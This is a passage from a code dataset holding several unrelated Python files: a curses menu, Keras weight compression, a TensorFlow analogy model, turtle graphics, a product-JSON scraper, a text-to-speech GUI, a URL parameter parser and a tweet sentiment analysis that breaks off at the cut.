#\n# #\n# wwidth - width of the subwindow #\n# #\n# page - current location in multi-dimensional list. #\n#---------------------------------------------------------------# \ndef printOptions(row, window, wheight, wwidth, page):\n\n for x in range(0, len(multiList[page])):\n \n if x == len(multiList[page]) or row == wheight - 1: # Terminates printing if end of screen\n break # or end of list is reached\n \n if row == 0: # Highlights first option on screen\n window.addstr(multiList[page][x], curses.color_pair(1))\n row = row + 1\n window.move(row, 0)\n\n else:\n \n window.addstr(multiList[page][x])\n row = row + 1\n window.move(row, 0)\n\n fullMessage = \"Page: \" + str(page + 1) + space + message\n window.move(wheight - 2, 0) # Moves cursor to bottom of the screen\n window.addstr(fullMessage, curses.color_pair(2)) # Adds instructions with blue highlight\n\n for i in range(len(message), wwidth - 12): # adds color to remaining spaces of the line\n window.addstr(\" \", curses.color_pair(2))\n\n window.move(0, 0) # Move cursor to the top\n\n\n#---------------------------------------------------------------#\n# Do you really need to know what this function does? #\n#---------------------------------------------------------------#\ndef main(): \n \n page = 0 \n row = 0\n setList() \n stdscr = curses.initscr() # Begin curses window\n curses.noecho() #\n stdscr.idlok(True) # Use hardware line editing facilities.\n height,width = stdscr.getmaxyx() # Get width and height of window\n window = stdscr.subwin(height-1, width-1, 1, 1) # Create subscreen\n window.scrollok(True)\n stdscr.border(0) # Create border around subscreen.\n wheight, wwidth = window.getmaxyx()\n \n \n curses.curs_set(0) # Set cursor visibility to False\n window.keypad(1) # Enable special keys\n \n\n stdscr.nodelay(1) # getch() will be non-blocking.\n\n curses.start_color() # Enable color for highlighting\n curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_WHITE) # Color pair 1 for selection highlighting\n curses.init_pair(2, curses.COLOR_WHITE, curses.COLOR_BLUE) # Color pair 2 for instruction bar\n\n getList(files, wheight, multiList, page) # Get list of options to print on screen\n printOptions(row, window, wheight, wwidth, page) # Display options on screen\n\n row = 0\n window.move(row, 0) # Sets cursor position to (0,0)\n stdscr.refresh() # Refreshes screen to print changes\n beginConsole(row, isRunning, window, wheight, wwidth, multiList, page) # Begin user input\n\n curses.nocbreak() #\n stdscr.keypad(0) # End curses and terminate program\n curses.echo #\n curses.endwin() #\n\nif __name__ == '__main__':\n main()","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":19324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"509251454","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[23]:\n\n\nfrom keras.models import load_model\nimport sys\nimport numpy as np\nimport argparse as arg\nimport pandas as pd\nimport csv\nimport os\n\n\n# In[24]:\n\n\n######## Training ########\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten, Conv2D, SeparableConv2D, MaxPooling2D, Activation, BatchNormalization, Dropout\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.optimizers import Adam\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\n\nmodel = Sequential()\nmodel.add(Conv2D(filters=16, kernel_size=(5, 5), padding=\"same\", input_shape=(48,48,1), 
activation='relu'))\nmodel.add(BatchNormalization(axis=-1, momentum=0.5))\n\nmodel.add(SeparableConv2D(filters=32, kernel_size=(3, 3), padding=\"same\", activation='relu'))\nmodel.add(BatchNormalization(axis=-1, momentum=0.5))\nmodel.add(Dropout(0.2))\n\nmodel.add(SeparableConv2D(filters=64, kernel_size=(3, 3), padding=\"same\", activation='relu'))\nmodel.add(BatchNormalization(axis=-1, momentum=0.5))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.1))\n\nmodel.add(SeparableConv2D(filters=128, kernel_size=(3, 3), padding=\"same\", activation='relu'))\nmodel.add(BatchNormalization(axis=-1, momentum=0.5))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(0.1))\n\nmodel.add(SeparableConv2D(filters=128, kernel_size=(3, 3), padding=\"same\", activation='relu'))\nmodel.add(BatchNormalization(axis=-1, momentum=0.5))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\n\n# model.add(SeparableConv2D(filters=512, kernel_size=(3, 3), padding=\"same\", activation='relu'))\n# model.add(BatchNormalization(axis=-1, momentum=0.5))\n# model.add(MaxPooling2D(pool_size=(2,2)))\n# model.add(Dropout(0.2))\n\n\nmodel.add(Flatten())\nmodel.add(Dense(7, activation='softmax'))\n\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n\n# In[25]:\n\n\n# weight_filepath = \"small/140con16fiveto128_200_A0.598_L1.074_VA0.626_VL1.03.hdf5\"\nweight_filepath = \"less/16fiveto128_175_A0.663_L0.904_VA0.635_VL1.0.hdf5\"\nweight_filepath = \"less/16fiveto128_185_A0.666_L0.898_VA0.638_VL1.0.hdf5\"\nweight_filepath = \"less/16fiveto128_320_A0.673_L0.877_VA0.636_VL1.02.hdf5\"\nmodel.load_weights(weight_filepath)\n\n\n# In[26]:\n\n\nweights = model.get_weights()\nprint(len(weights))\ncompressed_weights = []\nfor i in range(len(weights)):\n if i > 27:\n compressed_weights.append(weights[i].astype(np.float16))\n else:\n compressed_weights.append(weights[i])\n\n\n# In[27]:\n\n\nnp.savez_compressed(\"part_compressed_w.npz\", compressed_w = np.array(compressed_weights))\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"hw8/compress.py","file_name":"compress.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"154475208","text":"import tensorflow as tf\nimport h5py\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\n# Import methods\nfrom ops import *\nfrom encoder import *\nfrom analogy_scoring_model import *\nfrom util import log\n\ndef check_path(path):\n if not os.path.exists(path):\n os.mkdir(path)\n\n# Method for creating input variable names\ndef create_input_var_names():\n\tinput_var_names = [\n\t\t\t\t\t'imgs',\n\t\t\t\t\t'ABCD',\n\t\t\t\t\t'not_D',]\n\treturn input_var_names\n\nclass Model(object):\n\n\tdef __init__(self, config, batch_ops, is_train=True):\n\n\t\t# Model name\n\t\tmodel_name = 'sub_batch_norm'\n\n\t\t# Model inputs\n\t\timgs = batch_ops['imgs']\n\t\tABCD = tf.cast(batch_ops['ABCD'], dtype=tf.int64)\n\t\tnot_D = tf.cast(batch_ops['not_D'], dtype=tf.int64)\n\n\t\t# Dimensions\n\t\tbatch_size = int(config.batch_size)\n\t\tN_foils = int(not_D.shape[1])\n\n\t\t# Get latent codes for all images\n\t\tA_latent, B_latent, C_latent, D_latent, all_foil_latent = encode_analogy_objs(imgs, ABCD, not_D)\n\t\tN_latent = int(A_latent.shape[1])\n\n\t\t# Normalization\n\t\t# Small constant (for avoiding division by zero)\n\t\teps = 1e-8\n\t\t# Scale and shift parameters\n\t\twith tf.variable_scope('norm_params', reuse=tf.AUTO_REUSE) as scope:\n\t\t\tscale = 
tf.get_variable('scale', N_latent, initializer=tf.ones_initializer())\n\t\t\tshift = tf.get_variable('shift', N_latent, initializer=tf.zeros_initializer())\n\t\t# Normalize over smaller sub-batches of 4\n\t\tN_sub_batches = int(batch_size / 4)\n\t\tA_batch_norm = []\n\t\tB_batch_norm = []\n\t\tC_batch_norm = []\n\t\tD_batch_norm = []\n\t\tfor b in range(N_sub_batches):\n\t\t\t# Extract sub-batch\n\t\t\tsub_batch_ind = np.arange(b * 4, (b+1) * 4)\n\t\t\tA_sub_batch = tf.gather(A_latent, sub_batch_ind, axis=0)\n\t\t\tB_sub_batch = tf.gather(B_latent, sub_batch_ind, axis=0)\n\t\t\tC_sub_batch = tf.gather(C_latent, sub_batch_ind, axis=0)\n\t\t\tD_sub_batch = tf.gather(D_latent, sub_batch_ind, axis=0)\n\t\t\t# Normalization parameters\n\t\t\tA_latent_mean, A_latent_var = tf.nn.moments(A_sub_batch, 0)\n\t\t\tA_latent_SD = tf.sqrt(A_latent_var + eps)\n\t\t\tB_latent_mean, B_latent_var = tf.nn.moments(B_sub_batch, 0)\n\t\t\tB_latent_SD = tf.sqrt(B_latent_var + eps)\n\t\t\tC_latent_mean, C_latent_var = tf.nn.moments(C_sub_batch, 0)\n\t\t\tC_latent_SD = tf.sqrt(C_latent_var + eps)\n\t\t\tD_latent_mean, D_latent_var = tf.nn.moments(D_sub_batch, 0)\n\t\t\tD_latent_SD = tf.sqrt(D_latent_var + eps)\n\t\t\t# Normalize\n\t\t\tA_sub_batch_norm = (((A_sub_batch - A_latent_mean) / A_latent_SD) * scale) + shift\n\t\t\tB_sub_batch_norm = (((B_sub_batch - B_latent_mean) / B_latent_SD) * scale) + shift\n\t\t\tC_sub_batch_norm = (((C_sub_batch - C_latent_mean) / C_latent_SD) * scale) + shift\n\t\t\tD_sub_batch_norm = (((D_sub_batch - D_latent_mean) / D_latent_SD) * scale) + shift\n\t\t\t# Add to list\n\t\t\tA_batch_norm.append(A_sub_batch_norm)\n\t\t\tB_batch_norm.append(B_sub_batch_norm)\n\t\t\tC_batch_norm.append(C_sub_batch_norm)\n\t\t\tD_batch_norm.append(D_sub_batch_norm)\n\t\t# Concatenate\n\t\tA_batch_norm = tf.concat(A_batch_norm, axis=0)\n\t\tB_batch_norm = tf.concat(B_batch_norm, axis=0)\n\t\tC_batch_norm = tf.concat(C_batch_norm, axis=0)\n\t\tD_batch_norm = tf.concat(D_batch_norm, axis=0)\n\n\t\t# [A, B, C, D] -> LSTM\n\t\tlog.info('[A,B,C,D] -> LSTM...')\n\t\tD_score = scoring_model(A_batch_norm, B_batch_norm, C_batch_norm, D_batch_norm)\n\n\t\t# [A, B, C, foils] -> LSTM\n\t\tlog.info('[A,B,C,foils] -> LSTM...')\n\t\tall_foil_score = []\n\t\tfor foil in range(N_foils):\n\t\t\t# Extract latent rep for this foil\n\t\t\tthis_foil_latent = all_foil_latent[:,foil,:]\n\t\t\t# Normalization\n\t\t\tfoil_batch_norm = []\n\t\t\tfor b in range(N_sub_batches):\n\t\t\t\t# Extract sub-batch\n\t\t\t\tsub_batch_ind = np.arange(b * 4, (b+1) * 4)\n\t\t\t\tfoil_sub_batch = tf.gather(this_foil_latent, sub_batch_ind, axis=0)\n\t\t\t\t# Normalization parameters\n\t\t\t\tfoil_latent_mean, foil_latent_var = tf.nn.moments(foil_sub_batch, 0)\n\t\t\t\tfoil_latent_SD = tf.sqrt(foil_latent_var + eps)\n\t\t\t\t# Normalize\n\t\t\t\tfoil_sub_batch_norm = (((foil_sub_batch - foil_latent_mean) / foil_latent_SD) * scale) + shift\n\t\t\t\t# Add to list\n\t\t\t\tfoil_batch_norm.append(foil_sub_batch_norm)\n\t\t\t# Concatenate\n\t\t\tfoil_batch_norm = tf.concat(foil_batch_norm, axis=0)\n\t\t\t# Get score\n\t\t\tfoil_score = scoring_model(A_batch_norm, B_batch_norm, C_batch_norm, foil_batch_norm)\n\t\t\t# Accumulate foil scores\n\t\t\tall_foil_score.append(foil_score)\n\n\t\t# Concatenate all scores\n\t\tall_foil_score = tf.concat(all_foil_score, axis=1)\n\t\tall_scores = tf.concat([D_score, all_foil_score], axis=1)\n\t\tall_scores_softmax = tf.nn.softmax(all_scores)\n\n\t\t# Loss\n\t\tlog.info(\"Loss (cross-entropy over candidate 
scores)...\")\n\t\ttargets = tf.concat([tf.ones(D_score.shape), tf.zeros(all_foil_score.shape)], axis=1)\n\t\tself.train_loss, accuracy, correct_preds = build_cross_entropy_loss(all_scores, targets)\n\t\taccuracy = accuracy * 100.0\n\n\t\t# Model outputs\n\t\tself.all_out = {\n\t\t\t\t\t\t'accuracy': accuracy}\n","sub_path":"VAEC_dataset_and_models/models/model_sub_batch_norm.py","file_name":"model_sub_batch_norm.py","file_ext":"py","file_size_in_byte":4738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"59230036","text":"from math import tan,cos,sin\nfrom turtle import *\nspeed(10) \nwidth(5)\n\n\ndef triangle(n):\n for i in range(3):\n forward(n)\n left(120)\n forward(n)\n \ndef debut():\n forward(30)\n left(117)\n forward(35)\n right(180)\n forward(35)\n left(63)\n\ndef fin():\n left(90)\n forward(74)\n right(150)\n forward(85)\n right(119)\n forward(45)\n right(180)\n forward(45)\n left(50)\n forward(35)\n right(180)\n forward(35)\n left(123)\n forward(35)\n\ndef lesTriangle(m):\n n=40\n m = n+24\n t = 83\n for i in range(3):\n forward(n)\n triangle(n)\n left(90)\n forward(m)\n left(180)\n forward(m)\n left(90)\n forward(n)\n left(90)\n forward(t)\n left(180)\n forward(t)\n left(90)\n n = n+15\n m = n+40\n t = t+14\n if t > 97:\n n = n - 18.5\n t = t-35\n m = m-20\ndef ellipse(x1,y1,a,b):\n pencolor(\"blue\")\n width(5)\n t=0\n \n while t<3.14:\n xM=x1+a*cos(t)\n yM=y1+b*sin(t)\n goto(xM,yM-2)\n t=t+0.1\n forward(400)\n setheading(0)\ndef deux(m):\n debut()\n lesTriangle(m)\n fin()\n\ndef lesEllipse():\n x = -400\n y = 0\n for i in range(3):\n ellipse(x,y,200,100)\n x = x+400\n y = y+1\n\n\nlesEllipse()\nleft(180)\npenup()\nforward(1200)\nleft(180)\npendown()\nfor i in range(3):\n m=10\n deux(m)\n setheading(0)\n m = m+1\n\nright(180)\n\npenup()\nforward(365)\npendown()\n\ndef lesRectangle():\n begin_fill()\n color(\"blue\")\n def rectangle(l,L):\n \n begin_fill()\n color(\"blue\")\n for i in range(2):\n forward(l)\n left(90)\n forward(L)\n left(90)\n end_fill()\n rectangle(70,20)\n begin_fill()\n color(\"blue\")\n up()\n forward(70)\n left(90)\n forward(20)\n down()\n right(90)\n forward(20)\n left(90)\n forward(20)\n left(90)\n forward(20+70+20)\n left(90)\n forward(20)\n left(90)\n forward(20)\n\n end_fill()\nlesRectangle()\nup()\nforward(400)\nright(90)\nforward(23)\nleft(90)\ndown()\n\nlesRectangle()\n\n\ndone()","sub_path":"pond.py","file_name":"pond.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"647254168","text":"import requests\nimport json\nfrom bs4 import BeautifulSoup\n\n\ndef fetch_products():\n response = requests.get(\"https://sokoglam.com/products.json?limit=500\")\n product_json = response.json()\n with open(\"all_products.json\", \"w\") as write_file:\n json.dump(product_json, write_file)\n\n\ndef parse_titles():\n with open(\"all_products.json\", \"r\") as read_file:\n data = json.load(read_file)\n titles = []\n for product in data[\"products\"]:\n titles.append(product[\"title\"])\n return titles\n\n\ndef write_titles():\n t = open(\"all_titles.txt\", \"w\")\n data = parse_titles()\n data_str = \"\\n \"\n data_str = data_str.join(data)\n t.write(data_str)\n t.close()\n\n\ndef parse_descriptions():\n with open(\"all_products.json\", \"r\") as read_file:\n data = json.load(read_file)\n descriptions = []\n for product in data[\"products\"]:\n body_html = product[\"body_html\"][\n :300\n ] # trimmed to make this 
more manageable\n soup = BeautifulSoup(body_html, \"html.parser\")\n descriptions.append(soup.get_text())\n # some stray tags still survive because the HTML was truncated mid-markup\n\n return descriptions\n\n\ndef write_descriptions():\n t = open(\"all_descriptions.txt\", \"w\")\n data = parse_descriptions()\n data_str = \"\\n \"\n data_str = data_str.join(data)\n t.write(data_str)\n t.close()\n\n\nwrite_descriptions()\n\n","sub_path":"descriptions/fetch_skincare.py","file_name":"fetch_skincare.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"302545405","text":"from tkinter import*\r\nfrom gtts import gTTS\r\nimport os\r\nroot=Tk()\r\nroot.title(\"Text to sound converter\")\r\nroot.geometry(\"500x200\")\r\nroot.iconbitmap(\"python_icon.ico\")\r\ndef convert():\r\n fh = open(\"Test.txt\",\"r\")#name of the txt file on your system\r\n myText =fh.read().replace(\"\\n\",\"\")\r\n language ='en'\r\n output = gTTS(text=myText,lang = language,slow=True)\r\n output.save(\"convertedoutput1.mp3\")#name of your Audio mp3 file after conversion\r\n fh.close()\r\n #os.system(\"start convertedoutput1.mp3\")\r\nconvet_button=Button(root,text=\"Convert\",font=(\"Helvetica\",18),command=convert)\r\nconvet_button.pack(pady=20)\r\nroot.mainloop()","sub_path":"convertingTextfile from_ inside the computer.py","file_name":"convertingTextfile from_ inside the computer.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"438609837","text":"# -*-coding:utf-8 -*\n\"\"\"Utility functions\"\"\"\n\ndef yes_or_no(question):\n \"\"\"Returns True if the user enters yes and False if they enter no\"\"\"\n reply = str(input(question+' (y/n): ')).lower().strip()\n # slicing instead of indexing avoids an IndexError on empty input\n if reply[:1] == 'y':\n return True\n if reply[:1] == 'n':\n return False\n else:\n return yes_or_no(\"Please enter \")\n","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"460672402","text":"import re\r\n\r\nclass ExtratorURL:\r\n def __init__(self, url):\r\n self.url = self.sanitiza_url(url)\r\n self.validar_url()\r\n\r\n def sanitiza_url(self, url):\r\n if type(url) == str:\r\n return url.strip()\r\n\r\n def validar_url(self):\r\n if not self.url:\r\n raise ValueError(\"The URL is empty\")\r\n\r\n padrao_url = \"(http(s)?://)?(www.)?bytebank.com(.br)?/cambio\"\r\n padrao_url = re.compile(padrao_url)\r\n\r\n match = padrao_url.match(self.url)\r\n\r\n if not match:\r\n raise ValueError(f\"The URL {self.url} is not valid.\")\r\n\r\n def get_url_base(self):\r\n indice_interrogacao = self.url.find(\"?\")\r\n url_base = self.url[:indice_interrogacao]\r\n return url_base\r\n\r\n def get_url_parametros(self):\r\n indice_interrogacao = self.url.find(\"?\")\r\n url_parametros = self.url[indice_interrogacao +1:]\r\n return url_parametros\r\n\r\n def get_valor_parametros(self, parametro_busca):\r\n indice_parametro = self.get_url_parametros().find(parametro_busca)\r\n indice_valor = indice_parametro + len(parametro_busca) +1\r\n indice_comercial = self.get_url_parametros().find(\"&\", indice_valor)\r\n \r\n if(indice_comercial == -1):\r\n valor = self.get_url_parametros()[indice_valor:]\r\n else:\r\n valor = self.get_url_parametros()[indice_valor:indice_comercial]\r\n return valor\r\n\r\n def __len__(self):\r\n return len(self.url)\r\n\r\n def __str__(self):\r\n return f\"URL: {self.url}\\nParameters: {self.get_url_parametros()}\\nURL Base: {self.get_url_base()}\"\r\n\r\n def __eq__(self, other):\r\n return self.url == other.url\r\n\r\nif __name__ == '__main__':\r\n newExtrator = ExtratorURL(\"bytebank.com/cambio?quantidade=100&moedaOrigem=real&moedaDestino=dolar\")\r\n valor_quantidade = newExtrator.get_valor_parametros(\"quantidade\")\r\n \r\n print(valor_quantidade)\r\n print(F\"URL length: {len(newExtrator)}\")\r\n print(f\"{newExtrator}\")\r\n","sub_path":"strings/extrator_url.py","file_name":"extrator_url.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"338691067","text":"import re\r\nimport string\r\n\r\nimport nltk\r\nimport numpy\r\nimport pandas as pd\r\nfrom nltk.tokenize import word_tokenize\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem import PorterStemmer\r\nfrom collections import Counter\r\nfrom nltk.stem import WordNetLemmatizer\r\nfrom nltk.probability import FreqDist\r\nfrom textblob import TextBlob\r\nfrom matplotlib import pyplot as plt\r\nfrom wordcloud import WordCloud, STOPWORDS\r\n\r\ndata = pd.read_csv(\"HSBC_UK_ALL_TWEETS.csv\", encoding=\"ISO-8859-1\", engine='python')\r\n\r\nprint(data.columns)\r\n\r\n# set of alphabets\r\na = ord('a')\r\nalphabetset = [chr(i) for i in range(a, a + 26)]\r\n\r\n\r\ndef FilterCovidTweets(data):\r\n tweetsList = data['absolute_tidy_tweets']\r\n # covidTweets={}\r\n tweetList = []\r\n dateList = []\r\n for i in range(len(tweetsList)):\r\n tweet = tweetsList[i]\r\n if \"coronavirus\" in str(tweet).lower() or \"covid\" in str(tweet).lower() or \"covid-19\" in str(\r\n tweet).lower() or \"corona\" in str(tweet).lower():\r\n tweetList.append(tweet)\r\n dateList.append(data['DATE'][i])\r\n print(\"found corona covid-19 ... at \", tweet)\r\n # pair only the filtered tweets with their dates\r\n covidDF = pd.DataFrame(list(zip(tweetList, dateList)), columns=[\"TWEET\", \"DATE\"])\r\n return covidDF\r\n\r\n\r\ndef FilterBankTweets(data):\r\n tweetsList = data['absolute_tidy_tweets']\r\n tweetList = []\r\n dateList = []\r\n bankTerms = [\"bank\", \"recession\", \"economy\", \"transaction\", \"collapse\", \"fraud\", \"finance\", \"financial\", \"rate\",\r\n \"mortgage\", \"loan\", \"card\", \"tax\", \"interest\", \"rate\", \"credit\", \"payment\", \"customer\", \"retail\",\r\n \"amount\", \"deposit\",\r\n \"decline\", \"branch\", \"hsbc\", \"hsbc uk\", \"debit\", \"credit\", \"contact\", \"call\",\"hsbcuk\",\"one\",\"still\",\"app\", \"helpdesk\"]\r\n for i in range(len(tweetsList)):\r\n tweet = tweetsList[i]\r\n if (any(term in str(tweet) for term in bankTerms)):\r\n tweetList.append(tweet)\r\n dateList.append(data['DATE'][i])\r\n # pair only the filtered tweets with their dates\r\n bankDF = pd.DataFrame(list(zip(tweetList, dateList)), columns=[\"TWEET\", \"DATE\"])\r\n return bankDF\r\n\r\n\r\ndef ListToString(listName):\r\n listToStr = ' '.join([str(elem) for elem in listName])\r\n return listToStr\r\n\r\n\r\ndef StemWords(words):\r\n ps = PorterStemmer()\r\n words_after_stemming = []\r\n for w in words:\r\n words_after_stemming.append(ps.stem(w))\r\n return words_after_stemming\r\n\r\n\r\ndef CreateWordCloud(tweetWords):\r\n stopwords = set(STOPWORDS)\r\n\r\n # Create the wordcloud object\r\n # converting list of strings to a string\r\n\r\n # wordcloud = WordCloud(width=800, height=800,\r\n # background_color='white',\r\n # stopwords=stopwords,\r\n # min_font_size=10).generate(tweetWords)\r\n\r\n words = nltk.tokenize.word_tokenize(tweetWords)\r\n word_count_dict = Counter(str(word) for word in words)\r\n wordcloud = WordCloud(width=580, height=290, random_state=21, max_font_size=100,\r\n background_color='white', stopwords=garbage).generate_from_frequencies(word_count_dict)\r\n plt.figure(figsize=(5.7, 2.7))\r\n plt.imshow(wordcloud, interpolation=\"bilinear\")\r\n plt.axis('off')\r\n plt.tight_layout(pad=0)\r\n plt.show()\r\n\r\n # wordcloud = WordCloud(width=480, height=480, margin=0).generate(text)\r\n\r\n # Display the generated image:\r\n # plt.imshow(wordcloud, interpolation='bilinear')\r\n # plt.axis(\"off\")\r\n # plt.margins(x=0, y=0)\r\n # plt.show()\r\n\r\n\r\ndef GiveDay(timestamp):\r\n day_string = timestamp.day\r\n return day_string\r\n\r\n\r\ndef GetTweetSentiment(tweets, data):\r\n positiveList = []\r\n negativeList = []\r\n neutralList = []\r\n dateTimeList = pd.to_datetime(data[\"DATE\"].values).tolist()\r\n # print(dateTimeList)\r\n\r\n for tweet in tweets:\r\n analysis = TextBlob(str(tweet))\r\n if analysis.sentiment.polarity > 0:\r\n positiveList.append(1)\r\n negativeList.append(0)\r\n neutralList.append(0)\r\n elif analysis.sentiment.polarity < 0:\r\n negativeList.append(1)\r\n positiveList.append(0)\r\n neutralList.append(0)\r\n else:\r\n neutralList.append(1)\r\n positiveList.append(0)\r\n negativeList.append(0)\r\n\r\n # #Polarity_List stores polarity of tweets preserving the order\r\n\r\n df = pd.DataFrame(list(zip(dateTimeList, positiveList, negativeList, neutralList)),\r\n columns=[\"DateTime\", \"Positive\", \"Negative\", \"Neutral\"])\r\n df.set_index('DateTime')\r\n\r\n # print(df)\r\n # truncate each timestamp to its calendar date\r\n df['Date'] = df[\"DateTime\"].apply(lambda df: pd.datetime(year=df.year, month=df.month, day=df.day))\r\n\r\n newDF = pd.DataFrame(list(zip(df['Date'], df['Positive'], df['Negative'], df['Neutral'])),\r\n columns=[\"Date\", \"POS\", \"NEG\", \"NEU\"])\r\n DailyTweets = newDF.set_index('Date').resample('D').sum()\r\n MonthlyTweets = newDF.set_index('Date').resample('M')[\"POS\", \"NEG\", \"NEU\"].sum()\r\n YearlyTweets = newDF.set_index('Date').resample('Y')[\"POS\", \"NEG\", \"NEU\"].sum()\r\n print(YearlyTweets)\r\n print(MonthlyTweets)\r\n print(DailyTweets)\r\n\r\n # Visualization of Tweet Sentiments:\r\n\r\n\r\ndef CompareSentiments(covidDF, bankDF):\r\n covidTweets = covidDF['TWEET']\r\n bankTweets = bankDF['TWEET']\r\n print(\"covid tweets \\n\", covidTweets)\r\n print(\"BANK TWEETS:::::\\n\", bankTweets)\r\n CovidPositiveList = []\r\n CovidNegativeList = []\r\n CovidNeutralList = []\r\n\r\n BankPositiveList = []\r\n BankNegativeList = []\r\n BankNeutralList = []\r\n\r\n dateTimeListCovid = pd.to_datetime(covidDF[\"DATE\"].values).tolist()\r\n dateTimeListBank = pd.to_datetime(bankDF['DATE'].values).tolist()\r\n\r\n # print(dateTimeListCovid)\r\n # print(dateTimeListBank)\r\n # print(dateTimeList)\r\n\r\n for tweet in covidTweets:\r\n if tweet != \"tweetnotfound\":\r\n analysis = TextBlob(str(tweet))\r\n if analysis.sentiment.polarity > 0:\r\n CovidPositiveList.append(1)\r\n CovidNegativeList.append(0)\r\n CovidNeutralList.append(0)\r\n elif analysis.sentiment.polarity < 0:\r\n CovidNegativeList.append(1)\r\n CovidPositiveList.append(0)\r\n CovidNeutralList.append(0)\r\n else:\r\n CovidNeutralList.append(1)\r\n CovidPositiveList.append(0)\r\n CovidNegativeList.append(0)\r\n else:\r\n CovidPositiveList.append(0)\r\n CovidNegativeList.append(0)\r\n CovidNeutralList.append(0)\r\n\r\n for tweet in bankTweets:\r\n if tweet != \"tweetnotfound\":\r\n analysis = TextBlob(str(tweet))\r\n if analysis.sentiment.polarity > 0:\r\n BankPositiveList.append(1)\r\n BankNegativeList.append(0)\r\n BankNeutralList.append(0)\r\n elif analysis.sentiment.polarity < 0:\r\n 
BankNegativeList.append(1)\r\n BankPositiveList.append(0)\r\n BankNeutralList.append(0)\r\n else:\r\n BankNeutralList.append(1)\r\n BankPositiveList.append(0)\r\n BankNegativeList.append(0)\r\n else:\r\n BankPositiveList.append(0)\r\n BankNegativeList.append(0)\r\n BankNeutralList.append(0)\r\n\r\n # #Polarity_List stores polarity of tweets preserving the order\r\n # forCovid df\r\n # print(\"DATA ki datee ------------- \\n\",data['DATE'])\r\n # print(\"Covid ki datee ------------- \\n\", covidDF['DATE'])\r\n\r\n df1 = pd.DataFrame(list(zip(dateTimeListCovid, CovidPositiveList, CovidNegativeList, CovidNeutralList)),\r\n columns=[\"DateTime\", \"CPositive\", \"CNegative\", \"CNeutral\"])\r\n\r\n # df for banking related tweets\r\n df2 = pd.DataFrame(list(zip(dateTimeListBank, BankPositiveList, BankNegativeList, BankNeutralList)),\r\n columns=[\"DateTime\", \"BPositive\", \"BNegative\", \"BNeutral\"])\r\n\r\n df1.set_index('DateTime')\r\n df2.set_index('DateTime')\r\n\r\n # print(df)\r\n df1['Date'] = df1[\"DateTime\"].apply(lambda df: pd.datetime(year=df.year, month=df.month, day=df.day))\r\n df2['Date'] = df2[\"DateTime\"].apply(lambda df: pd.datetime(year=df.year, month=df.month, day=df.day))\r\n\r\n print(\"DF---------------c o v i d---------------------------------------\\n\", df1)\r\n print(\"DF----------------b a n k--------------------------------------\\n\", df2)\r\n\r\n newDF1 = pd.DataFrame(list(zip(df1['Date'], df1['CPositive'], df1['CNegative'], df1['CNeutral'])),\r\n columns=[\"Date\", \"CovidPOS\", \"CovidNEG\", \"CovidNEU\"])\r\n newDF2 = pd.DataFrame(list(zip(df2['Date'], df2['BPositive'], df2['BNegative'], df2['BNeutral'])),\r\n columns=[\"Date\", \"BankPOS\", \"BankNEG\", \"BankNEU\"])\r\n\r\n print(\"newDF---------------c o v i d---------------------------------------\\n\", newDF1)\r\n print(\"newDF----------------b a n k--------------------------------------\\n\", newDF2)\r\n\r\n newDF1['Total'] = newDF1['CovidPOS'] + newDF1['CovidNEG'] + newDF1['CovidNEU']\r\n newDF2['Total'] = newDF2['BankPOS'] + newDF2['BankNEG'] + newDF2['BankNEU']\r\n\r\n print(\"newDF---------------c o v i d---------------------------------------\\n\", newDF1)\r\n print(\"newDF----------------b a n k--------------------------------------\\n\", newDF2)\r\n\r\n # dailyCovid = newDF1.groupby('Date').sum()\r\n # dailyBank = newDF2.groupby('Date').sum()\r\n\r\n dailyCovidList = newDF1.set_index('Date').resample('D')[\"CovidPOS\", \"CovidNEG\", \"CovidNEU\", \"Total\"].sum()\r\n dailyBankList = newDF2.set_index('Date').resample('D')[\"BankPOS\", \"BankNEG\", \"BankNEU\", \"Total\"].sum()\r\n\r\n print(\"DailyCovid---------------c o v i d---------------------------------------\\n\", dailyCovidList)\r\n print(\"DailyBank----------------b a n k--------------------------------------\\n\", dailyBankList)\r\n\r\n # taking out data for week 1. 
